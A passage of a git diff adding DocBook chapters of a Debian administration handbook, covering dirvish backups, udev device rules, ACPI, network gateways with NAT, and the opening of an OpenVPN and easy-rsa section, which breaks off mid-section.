+				The <literal>bank</literal> setting indicates the directory in which the backups are stored. The <literal>exclude</literal> setting allows you to indicate files (or file types) to exclude from the backup. The <literal>Runall</literal> is a list of file sets to backup with a time-stamp for each set, which allows you to assign the correct date to the copy, in case the backup is not triggered at precisely the assigned time. You have to indicate a time just before the actual execution time (which is, by default, 10:04 pm in Debian, according to <filename>/etc/cron.d/dirvish</filename>). Finally, the <literal>expire-default</literal> and <literal>expire-rule</literal> settings define the expiration policy for backups. The above example keeps forever backups that are generated on the first Sunday of each quarter, deletes after one year those from the first Sunday of each month, and after 3 months those from other Sundays. Other daily backups are kept for 15 days. The order of the rules does matter, Dirvish uses the last matching rule, or the <literal>expire-default</literal> one if no other <literal>expire-rule</literal> matches.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Scheduled expiration</title>
+			 <para>
+				The expiration rules are not used by <command>dirvish-expire</command> to do its job. In reality, the expiration rules are applied when creating a new backup copy to define the expiration date associated with that copy. <command>dirvish-expire</command> simply peruses the stored copies and deletes those for which the expiration date has passed.
+			</para>
+			 </sidebar> <example id="example.dirvish-vault">
+				<title>The <filename>/backup/root/dirvish/default.conf</filename> file</title>
+				 
+<programlisting>client: rivendell.falcot.com
+tree: /
+xdev: 1
+index: gzip
+image-default: %Y%m%d
+exclude:
+    /var/cache/apt/archives/*.deb
+    /var/cache/man/**
+    /tmp/**
+    /var/tmp/**
+    *.bak
+</programlisting>
+
+			</example>
+			 <para>
+				The above example specifies the set of files to back up: these are files on the machine <emphasis>rivendell.falcot.com</emphasis> (for local data backup, simply specify the name of the local machine as indicated by <command>hostname</command>), especially those in the root tree (<literal>tree: /</literal>), except those listed in <literal>exclude</literal>. The backup will be limited to the contents of one filesystem (<literal>xdev: 1</literal>). It will not include files from other mount points. An index of saved files will be generated (<literal>index: gzip</literal>), and the image will be named according to the current date (<literal>image-default: %Y%m%d</literal>).
+			</para>
+			 <para>
+				There are many options available, all documented in the <citerefentry><refentrytitle>dirvish.conf</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> manual page. Once these configuration files are setup, you have to initialize each file set with the <command>dirvish --vault <replaceable>vault</replaceable> --init</command> command. From there on the daily invocation of <command>dirvish-runall</command> will automatically create a new backup copy just after having deleted those that expired.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Remote backup over SSH</title>
+			 <para>
+				When dirvish needs to save data to a remote machine, it will use <command>ssh</command> to connect to it, and will start <command>rsync</command> as a server. This requires the root user to be able to automatically connect to it. The use of an SSH authentication key allows precisely that (see <xref linkend="sect.ssh-key-based-auth" />).
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Restoring Machines without Backups</title>
+			 <para>
+				Desktop computers, which are not backed up, will be easy to reinstall from custom DVD-ROMs prepared with <emphasis>Simple-CDD</emphasis> (see <xref linkend="sect.simple-cdd" />). Since this performs an installation from scratch, it loses any customization that can have been made after the initial installation. This is fine since the systems are all hooked to a central LDAP directory for accounts and most desktop applications are preconfigured thanks to dconf (see <xref linkend="sect.gnome-desktop" /> for more information about this).
+			</para>
+			 <para>
+				The Falcot Corp administrators are aware of the limits in their backup policy. Since they can't protect the backup server as well as a tape in a fireproof safe, they have installed it in a separate room so that a disaster such as a fire in the server room won't destroy backups along with everything else. Furthermore, they do an incremental backup on DVD-ROM once per week — only files that have been modified since the last backup are included.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Backing up SQL and LDAP services</title>
+			 <para>
+				Many services (such as SQL or LDAP databases) cannot be backed up by simply copying their files (unless they are properly interrupted during creation of the backups, which is frequently problematic, since they are intended to be available at all times). As such, it is necessary to use an “export” mechanism to create a “data dump” that can be safely backed up. These are often quite large, but they compress well. To reduce the storage space required, you will only store a complete text file per week, and a <command>diff</command> each day, which is created with a command of the type <command>diff <replaceable>file_from_yesterday</replaceable> <replaceable>file_from_today</replaceable></command>. The <command>xdelta</command> program produces incremental differences from binary dumps.
+			</para>
+			 <indexterm>
+				<primary><command>xdelta</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>diff</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>dump</primary>
+			</indexterm>
+			 </sidebar> <sidebar> <title><emphasis>CULTURE</emphasis> <emphasis>TAR</emphasis>, the standard for tape backups</title>
+			 <indexterm>
+				<primary>backup</primary>
+				<secondary>on tape</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>tape, backup</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>TAR</primary>
+			</indexterm>
+			 <para>
+				Historically, the simplest means of making a backup on Unix was to store a <emphasis>TAR</emphasis> archive on a tape. The <command>tar</command> command even got its name from “Tape ARchive”.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.hotplug">
+		<title>Hot Plugging: <emphasis>hotplug</emphasis></title>
+		 <section>
+			<title>Introduction</title>
+			 <para>
+				The <emphasis>hotplug</emphasis> kernel subsystem dynamically handles the addition and removal of devices, by loading the appropriate drivers and by creating the corresponding device files (with the help of <command>udevd</command>). With modern hardware and virtualization, almost everything can be hotplugged: from the usual USB/PCMCIA/IEEE 1394 peripherals to SATA hard drives, but also the CPU and the memory.
+			</para>
+			 <para>
+				The kernel has a database that associates each device ID with the required driver. This database is used during boot to load all the drivers for the peripheral devices detected on the different buses, but also when an additional hotplug device is connected. Once the device is ready for use, a message is sent to <command>udevd</command> so it will be able to create the corresponding entry in <filename>/dev/</filename>.
+			</para>
+			 <indexterm>
+				<primary><emphasis>hotplug</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>hotplug</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>USB</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>IEEE 1394</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>PCMCIA</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>SATA</primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>The Naming Problem</title>
+			 <para>
+				Before the appearance of hotplug connections, it was easy to assign a fixed name to a device. It was based simply on the position of the devices on their respective bus. But this is not possible when such devices can come and go on the bus. The typical case is the use of a digital camera and a USB key, both of which appear to the computer as disk drives. The first one connected may be <filename>/dev/sdb</filename> and the second <filename>/dev/sdc</filename> (with <filename>/dev/sda</filename> representing the computer's own hard drive). The device name is not fixed; it depends on the order in which devices are connected.
+			</para>
+			 <para>
+				Additionally, more and more drivers use dynamic values for devices' major/minor numbers, which makes it impossible to have static entries for the given devices, since these essential characteristics may vary after a reboot.
+			</para>
+			 <para>
+				<emphasis>udev</emphasis> was created precisely to solve this problem.
+			</para>
+
+		</section>
+		 <section>
+			<title>How <emphasis>udev</emphasis> Works</title>
+			 <para>
+				When <emphasis>udev</emphasis> is notified by the kernel of the appearance of a new device, it collects various information on the given device by consulting the corresponding entries in <filename>/sys/</filename>, especially those that uniquely identify it (MAC address for a network card, serial number for some USB devices, etc.).
+			</para>
+			 <para>
+				Armed with all of this information, <emphasis>udev</emphasis> then consults all of the rules contained in <filename>/etc/udev/rules.d/</filename> and <filename>/lib/udev/rules.d/</filename>. In this process it decides how to name the device, what symbolic links to create (to give it alternative names), and what commands to execute. All of these files are consulted, and the rules are all evaluated sequentially (except when a file uses “GOTO” directives). Thus, there may be several rules that correspond to a given event.
+			</para>
+			 <para>
+				The syntax of rules files is quite simple: each row contains selection criteria and variable assignments. The former are used to select events for which there is a need to react, and the latter defines the action to take. They are all simply separated with commas, and the operator implicitly differentiates between a selection criterion (with comparison operators, such as <literal>==</literal> or <literal>!=</literal>) or an assignment directive (with operators such as <literal>=</literal>, <literal>+=</literal> or <literal>:=</literal>).
+			</para>
+			 <para>
+				Comparison operators are used on the following variables:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>KERNEL</literal>: the name that the kernel assigns to the device;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>ACTION</literal>: the action corresponding to the event (“add” when a device has been added, “remove” when it has been removed);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>DEVPATH</literal>: the path of the device's <filename>/sys/</filename> entry;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>SUBSYSTEM</literal>: the kernel subsystem which generated the request (there are many, but a few examples are “usb”, “ide”, “net”, “firmware”, etc.);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>ATTR{<replaceable>attribute</replaceable>}</literal>: file contents of the <replaceable>attribute</replaceable> file in the <filename>/sys/<replaceable>$devpath</replaceable>/</filename> directory of the device. This is where you find the MAC address and other bus specific identifiers;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>KERNELS</literal>, <literal>SUBSYSTEMS</literal> and <literal>ATTRS{<replaceable>attributes</replaceable>}</literal> are variations that will try to match the different options on one of the parent devices of the current device;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>PROGRAM</literal>: delegates the test to the indicated program (true if it returns 0, false if not). The content of the program's standard output is stored so that it can be reused by the <literal>RESULT</literal> test;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>RESULT</literal>: execute tests on the standard output stored during the last call to <literal>PROGRAM</literal>.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The right operands can use pattern expressions to match several values at the same time. For instance, <literal>*</literal> matches any string (even an empty one); <literal>?</literal> matches any character, and <literal>[]</literal> matches the set of characters listed between the square brackets (or the opposite thereof if the first character is an exclamation point, and contiguous ranges of characters are indicated like <literal>a-z</literal>).
+			</para>
+			 <para>
+				Regarding the assignment operators, <literal>=</literal> assigns a value (and replaces the current value); in the case of a list, it is emptied and contains only the value assigned. <literal>:=</literal> does the same, but prevents later changes to the same variable. As for <literal>+=</literal>, it adds an item to a list. The following variables can be changed:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>NAME</literal>: the device filename to be created in <filename>/dev/</filename>. Only the first assignment counts; the others are ignored;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>SYMLINK</literal>: the list of symbolic links that will point to the same device;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>OWNER</literal>, <literal>GROUP</literal> and <literal>MODE</literal> define the user and group that owns the device, as well as the associated permission;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>RUN</literal>: the list of programs to execute in response to this event.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The values assigned to these variables may use a number of substitutions:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>$kernel</literal> or <literal>%k</literal>: equivalent to <literal>KERNEL</literal>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$number</literal> or <literal>%n</literal>: the order number of the device, for example, for <literal>sda3</literal>, it would be “3”;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$devpath</literal> or <literal>%p</literal>: equivalent to <literal>DEVPATH</literal>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$attr{<replaceable>attribute</replaceable>}</literal> or <literal>%s{<replaceable>attribute</replaceable>}</literal>: equivalent to <literal>ATTRS{<replaceable>attribute</replaceable>}</literal>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$major</literal> or <literal>%M</literal>: the kernel major number of the device;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$minor</literal> or <literal>%m</literal>: the kernel minor number of the device;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>$result</literal> or <literal>%c</literal>: the string output by the last program invoked by <literal>PROGRAM</literal>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						and, finally, <literal>%%</literal> and <literal>$$</literal> for the percent and dollar sign, respectively.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The above lists are not complete (they include only the most important parameters), but the <citerefentry><refentrytitle>udev</refentrytitle>
+				<manvolnum>7</manvolnum></citerefentry> manual page should be exhaustive.
+			</para>
+
+		</section>
+		 <section>
+			<title>A concrete example</title>
+			 <para>
+				Let us consider the case of a simple USB key and try to assign it a fixed name. First, you must find the elements that will identify it in a unique manner. For this, plug it in and run <command>udevadm info -a -n /dev/sdc</command> (replacing <replaceable>/dev/sdc</replaceable> with the actual name assigned to the key).
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>udevadm info -a -n /dev/sdc</userinput>
+<computeroutput>[...]
+  looking at device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0/block/sdc':
+    KERNEL=="sdc"
+    SUBSYSTEM=="block"
+    DRIVER==""
+    ATTR{range}=="16"
+    ATTR{ext_range}=="256"
+    ATTR{removable}=="1"
+    ATTR{ro}=="0"
+    ATTR{size}=="126976"
+    ATTR{alignment_offset}=="0"
+    ATTR{capability}=="53"
+    ATTR{stat}=="      51      100     1208      256        0        0        0        0        0      192      25        6"
+    ATTR{inflight}=="       0        0"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="scsi"
+    DRIVERS=="sd"
+    ATTRS{device_blocked}=="0"
+    ATTRS{type}=="0"
+    ATTRS{scsi_level}=="3"
+    ATTRS{vendor}=="I0MEGA  "
+    ATTRS{model}=="UMni64MB*IOM2C4 "
+    ATTRS{rev}=="    "
+    ATTRS{state}=="running"
+[...]
+    ATTRS{max_sectors}=="240"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="usb"
+    DRIVERS=="usb"
+    ATTRS{configuration}=="iCfg"
+    ATTRS{bNumInterfaces}==" 1"
+    ATTRS{bConfigurationValue}=="1"
+    ATTRS{bmAttributes}=="80"
+    ATTRS{bMaxPower}=="100mA"
+    ATTRS{urbnum}=="398"
+    ATTRS{idVendor}=="4146"
+    ATTRS{idProduct}=="4146"
+    ATTRS{bcdDevice}=="0100"
+[...]
+    ATTRS{manufacturer}=="USB Disk"
+    ATTRS{product}=="USB Mass Storage Device"
+    ATTRS{serial}=="M004021000001"
+[...]
+</computeroutput></screen>
+			 <para>
+				To create a new rule, you can use tests on the device's variables, as well as those of one of the parent devices. The above case allows us to create two rules like these:
+			</para>
+			 
+<programlisting>KERNEL=="sd?", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/disk"
+KERNEL=="sd?[0-9]", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/part%n"
+</programlisting>
+			 <para>
+				Once these rules are set in a file, named for example <filename>/etc/udev/rules.d/010_local.rules</filename>, you can simply remove and reconnect the USB key. You can then see that <filename>/dev/usb_key/disk</filename> represents the disk associated with the USB key, and <filename>/dev/usb_key/part1</filename> is its first partition.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Debugging <emphasis>udev</emphasis>'s configuration</title>
+			 <para>
+				Like many daemons, <command>udevd</command> stores logs in <filename>/var/log/daemon.log</filename>. But it is not very verbose by default, and it is usually not enough to understand what is happening. The <command>udevadm control --log-priority=info</command> command increases the verbosity level and solves this problem. <command>udevadm control --log-priority=err</command> returns to the default verbosity level.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.power-management">
+		<title>Power Management: Advanced Configuration and Power Interface (ACPI)</title>
+		 <indexterm>
+			<primary>power management</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>management, power management</primary>
+		</indexterm>
+		 <para>
+			The topic of power management is often problematic. Indeed, properly suspending the computer requires that all the computer's device drivers know how to put them to standby, and that they properly reconfigure the devices upon waking. Unfortunately, there are still a few devices unable to sleep well under Linux, because their manufacturers have not provided the required specifications.
+		</para>
+		 <para>
+			Linux supports ACPI (Advanced Configuration and Power Interface) — the most recent standard in power management. The <emphasis role="pkg">acpid</emphasis> package provides a daemon that looks for power management related events (switching between AC and battery power on a laptop, etc.) and that can execute various commands in response.
+		</para>
+		 <indexterm>
+			<primary>ACPI</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Advanced Configuration and Power Interface</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>acpid</command></primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>BEWARE</emphasis> Graphics card and standby</title>
+		 <para>
+			The graphics card driver is often the culprit when standby doesn't work properly. In that case, it is a good idea to test the latest version of the X.org graphics server.
+		</para>
+		 </sidebar> <para>
+			After this overview of basic services common to many Unix systems, we will focus on the environment of the administered machines: the network. Many services are required for the network to work properly. They will be discussed in the next chapter.
+		</para>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/10_network-infrastructure.xml b/tmp/cs-CZ/xml/10_network-infrastructure.xml
new file mode 100644
index 000000000..800d4ea15
--- /dev/null
+++ b/tmp/cs-CZ/xml/10_network-infrastructure.xml
@@ -0,0 +1,1583 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="network-infrastructure" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Network</keyword>
+			 <keyword>Gateway</keyword>
+			 <keyword>TCP/IP</keyword>
+			 <keyword>IPv6</keyword>
+			 <keyword>DNS</keyword>
+			 <keyword>Bind</keyword>
+			 <keyword>DHCP</keyword>
+			 <keyword>QoS</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title id="infrastructure.title">Network Infrastructure</title>
+	 <highlights> <para>
+		Linux sports the whole Unix heritage for networking, and Debian provides a full set of tools to create and manage them. This chapter reviews these tools.
+	</para>
+	 </highlights> <section id="sect.gateway">
+		<title>Gateway</title>
+		 <para>
+			A gateway is a system linking several networks. This term often refers to a local network's “exit point” on the mandatory path to all external IP addresses. The gateway is connected to each of the networks it links together, and acts as a router to convey IP packets between its various interfaces.
+		</para>
+		 <indexterm>
+			<primary>gateway</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>gateway</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>router</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> IP packet</title>
+		 <indexterm>
+			<primary>packet</primary>
+			<secondary>IP</secondary>
+		</indexterm>
+		 <para>
+			Most networks nowadays use the IP protocol (<emphasis>Internet Protocol</emphasis>). This protocol segments the transmitted data into limited-size packets. Each packet contains, in addition to its payload data, a number of details required for its proper routing.
+		</para>
+		 </sidebar> <sidebar id="sidebar.tcp-udp"> <title><emphasis>BACK TO BASICS</emphasis> TCP/UDP</title>
+		 <indexterm>
+			<primary>port</primary>
+			<secondary>TCP</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>port</primary>
+			<secondary>UDP</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>TCP, port</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>UDP, port</primary>
+		</indexterm>
+		 <para>
+			Many programs do not handle the individual packets themselves, even though the data they transmit does travel over IP; they often use TCP (<emphasis>Transmission Control Protocol</emphasis>). TCP is a layer over IP allowing the establishment of connections dedicated to data streams between two points. The programs then only see an entry point into which data can be fed with the guarantee that the same data exits without loss (and in the same sequence) at the exit point at the other end of the connection. Although many kinds of errors can happen in the lower layers, they are compensated by TCP: lost packets are retransmitted, and packets arriving out of order (for example, if they used different paths) are re-ordered appropriately.
+		</para>
+		 <para>
+			Another protocol relying on IP is UDP (<emphasis>User Datagram Protocol</emphasis>). In contrast to TCP, it is packet-oriented. Its goals are different: the purpose of UDP is only to transmit one packet from an application to another. The protocol does not try to compensate for possible packet loss on the way, nor does it ensure that packets are received in the same order as were sent. The main advantage to this protocol is that the latency is greatly improved, since the loss of a single packet does not delay the receiving of all following packets until the lost one is retransmitted.
+		</para>
+		 <para>
+			TCP and UDP both involve ports, which are “extension numbers” for establishing communication with a given application on a machine. This concept allows keeping several different communications in parallel with the same correspondent, since these communications can be distinguished by the port number.
+		</para>
+		 <para>
+			Some of these port numbers — standardized by the IANA (<emphasis>Internet Assigned Numbers Authority</emphasis>) — are “well-known” for being associated with network services. For instance, TCP port 25 is generally used by the email server. <ulink type="block" url="http://www.iana.org/assignments/port-numbers" />
+		</para>
+		 </sidebar> <para>
+			When a local network uses a private address range (not routable on the Internet), the gateway needs to implement <emphasis>address masquerading</emphasis> so that the machines on the network can communicate with the outside world. The masquerading operation is a kind of proxy operating on the network level: each outgoing connection from an internal machine is replaced with a connection from the gateway itself (since the gateway does have an external, routable address), the data going through the masqueraded connection is sent to the new one, and the data coming back in reply is sent through to the masqueraded connection to the internal machine. The gateway uses a range of dedicated TCP ports for this purpose, usually with very high numbers (over 60000). Each connection coming from an internal machine then appears to the outside world as a connection coming from one of these reserved ports.
+		</para>
+		 <indexterm>
+			<primary>masquerading</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>CULTURE</emphasis> Private address range</title>
+		 <indexterm>
+			<primary>IP address</primary>
+			<secondary>private</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>private IP address</primary>
+		</indexterm>
+		 <para>
+			RFC 1918 defines three ranges of IPv4 addresses not meant to be routed on the Internet but only used in local networks. The first one, <literal>10.0.0.0/8</literal> (see sidebar <xref linkend="sidebar.networking-basics" />), is a class-A range (with 2<superscript>24</superscript> IP addresses). The second one, <literal>172.16.0.0/12</literal>, gathers 16 class-B ranges (<literal>172.16.0.0/16</literal> to <literal>172.31.0.0/16</literal>), each containing 2<superscript>16</superscript> IP addresses. Finally, <literal>192.168.0.0/16</literal> is a class-B range (grouping 256 class-C ranges, <literal>192.168.0.0/24</literal> to <literal>192.168.255.0/24</literal>, with 256 IP addresses each). <ulink type="block" url="http://www.faqs.org/rfcs/rfc1918.html" />
+		</para>
+		 </sidebar> <para>
+			The gateway can also perform two kinds of <emphasis>network address translation</emphasis> (or NAT for short). The first kind, <emphasis>Destination NAT</emphasis> (DNAT) is a technique to alter the destination IP address (and/or the TCP or UDP port) for a (generally) incoming connection. The connection tracking mechanism also alters the following packets in the same connection to ensure continuity in the communication. The second kind of NAT is <emphasis>Source NAT</emphasis> (SNAT), of which <emphasis>masquerading</emphasis> is a particular case; SNAT alters the source IP address (and/or the TCP or UDP port) of a (generally) outgoing connection. As for DNAT, all the packets in the connection are appropriately handled by the connection tracking mechanism. Note that NAT is only relevant for IPv4 and its limited address space; in IPv6, the wide availability of addresses greatly reduces the usefulness of NAT by allowing all “internal” addresses to be directly routable on the Internet (this does not imply that internal machines are accessible, since intermediary firewalls can filter traffic).
+		</para>
+		 <indexterm>
+			<primary>NAT</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Network</primary>
+			<secondary>Address Translation</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>SNAT</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>DNAT</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Destination NAT</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Source NAT</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Port forwarding</title>
+		 <indexterm>
+			<primary>port forwarding</primary>
+		</indexterm>
+		 <para>
+			A concrete application of DNAT is <emphasis>port forwarding</emphasis>. Incoming connections to a given port of a machine are forwarded to a port on another machine. Other solutions may exist for achieving a similar effect, though, especially at the application level with <command>ssh</command> (see <xref linkend="sect.ssh-port-forwarding" />) or <command>redir</command>.
+		</para>
+		 </sidebar> <para>
+			Enough theory, let's get practical. Turning a Debian system into a gateway is a simple matter of enabling the appropriate option in the Linux kernel, by way of the <filename>/proc/</filename> virtual filesystem:
+		</para>
+		 
+<screen>
+<computeroutput># </computeroutput><userinput>echo 1 &gt; /proc/sys/net/ipv4/conf/default/forwarding</userinput></screen>
+		 <para>
+			This option can also be automatically enabled on boot if <filename>/etc/sysctl.conf</filename> sets the <literal>net.ipv4.conf.default.forwarding</literal> option to <literal>1</literal>.
+		</para>
+		 <example id="example.sysctl.conf">
+			<title>The <filename>/etc/sysctl.conf</filename> file</title>
+			 
+<programlisting>
+net.ipv4.conf.default.forwarding = 1
+net.ipv4.conf.default.rp_filter = 1
+net.ipv4.tcp_syncookies = 1
+</programlisting>
+
+		</example>
+		 <para>
+			The same effect can be obtained for IPv6 by simply replacing <literal>ipv4</literal> with <literal>ipv6</literal> in the manual command and using the <literal>net.ipv6.conf.all.forwarding</literal> line in <filename>/etc/sysctl.conf</filename>.
+		</para>
+		 <para>
+			Enabling IPv4 masquerading is a slightly more complex operation that involves configuring the <emphasis>netfilter</emphasis> firewall.
+		</para>
+		 <para>
+			Similarly, using NAT (for IPv4) requires configuring <emphasis>netfilter</emphasis>. Since the primary purpose of this component is packet filtering, the details are listed in <xref linkend="security" xrefstyle="select: label quotedtitle nopage" /> (see <xref linkend="sect.firewall-packet-filtering" />).
+		</para>
+
+	</section>
+	 <section id="sect.virtual-private-network">
+		<title>Virtual Private Network</title>
+		 <para>
+			A <emphasis>Virtual Private Network</emphasis> (VPN for short) is a way to link two different local networks through the Internet by way of a tunnel; the tunnel is usually encrypted for confidentiality. VPNs are often used to integrate a remote machine within a company's local network.
+		</para>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>virtual private</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>VPN</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>virtual private network</primary>
+		</indexterm>
+		 <para>
+			Several tools provide this. OpenVPN is an efficient solution, easy to deploy and maintain, based on SSL/TLS. Another possibility is using IPsec to encrypt IP traffic between two machines; this encryption is transparent, which means that applications running on these hosts need not be modified to take the VPN into account. SSH can also be used to provide a VPN, in addition to its more conventional features. Finally, a VPN can be established using Microsoft's PPTP protocol. Other solutions exist, but are beyond the focus of this book.
+		</para>
+		 <section id="sect.openvpn">
+			<title>OpenVPN</title>
+			 <indexterm>
+				<primary>OpenVPN</primary>
+			</indexterm>
+			 <para>
+				OpenVPN is a piece of software dedicated to creating virtual private networks. Its setup involves creating virtual network interfaces on the VPN server and on the client(s); both <literal>tun</literal> (for IP-level tunnels) and <literal>tap</literal> (for Ethernet-level tunnels) interfaces are supported. In practice, <literal>tun</literal> interfaces will most often be used except when the VPN clients are meant to be integrated into the server's local network by way of an Ethernet bridge.
+			</para>
+			 <para>
+				OpenVPN relies on OpenSSL for all the SSL/TLS cryptography and associated features (confidentiality, authentication, integrity, non-repudiation). It can be configured either with a shared private key or using X.509 certificates based on a public key infrastructure. The latter configuration is strongly preferred since it allows greater flexibility when faced with a growing number of roaming users accessing the VPN.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> SSL and TLS</title>
+			 <indexterm>
+				<primary>SSL</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>TLS</primary>
+			</indexterm>
+			 <para>
+				The SSL protocol (<emphasis>Secure Socket Layer</emphasis>) was invented by Netscape to secure connections to web servers. It was later standardized by IETF under the acronym TLS (<emphasis>Transport Layer Security</emphasis>). Since then TLS continued to evolve and nowadays SSL is deprecated due to multiple design flaws that have been discovered.
+			</para>
+			 </sidebar> <section id="sect.easy-rsa">
+				<title>Public Key Infrastructure: <emphasis>easy-rsa</emphasis></title>
+				 <indexterm>
+					<primary>PKI (Public Key Infrastructure)</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Public Key Infrastructure</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>X.509, certificate</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>certificate</primary>
+					<secondary>X.509</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary><emphasis>easy-rsa</emphasis></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>RSA (algorithm)</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>key pair</primary>
+				</indexterm>
+				 <para>
+					The RSA algorithm is widely used in public-key cryptography. It involves a “key pair”, comprised of a private and a public key. The two keys are closely linked to each other, and their mathematical properties are such that a message encrypted with the public key can only be decrypted by someone knowing the private key, which ensures confidentiality. In the opposite direction, a message encrypted with the private key can be decrypted by anyone knowing the public key, which allows authenticating the origin of a message since only someone with access to the private key could generate it. When associated with a digital hash function (MD5, SHA1, or a more recent variant), this leads to a signature mechanism that can be applied to any message.
+				</para>
+				 <para>
+					However, anyone can create a key pair, store any identity on it, and pretend to be the identity of their choice. One solution involves the concept of a <emphasis>Certification Authority</emphasis> (CA), formalized by the X.509 standard. This term covers an entity that holds a trusted key pair known as a <emphasis>root certificate</emphasis>. This certificate is only used to sign other certificates (key pairs), after proper steps have been undertaken to check the identity stored on the key pair. Applications using X.509 can then check the certificates presented to them, if they know about the trusted root certificates.
+				</para>
+				 <para>
+					OpenVPN follows this rule. Since public CAs only emit certificates in exchange for a (hefty) fee, it is also possible to create a private certification authority within the company. The <emphasis role="pkg">easy-rsa</emphasis> package provides tools to serve as an X.509 certification infrastructure, implemented as a set of scripts using the <command>openssl</command> command.
+				</para>
+				 <sidebar> <title><emphasis>NOTE</emphasis> <emphasis>easy-rsa</emphasis> before <emphasis role="distribution">Jessie</emphasis></title>
+				 <para>
+					In versions of Debian up to <emphasis role="distribution">Wheezy</emphasis>, <emphasis>easy-rsa</emphasis> was distributed as part of the <emphasis role="pkg">openvpn</emphasis> package, and its scripts were to be found under <filename>/usr/share/doc/openvpn/examples/easy-rsa/2.0/</filename>. Setting up a CA involved copying that directory, instead of using the <command>make-cadir</command> command as documented here.
+				</para>
+				 </sidebar> <para>
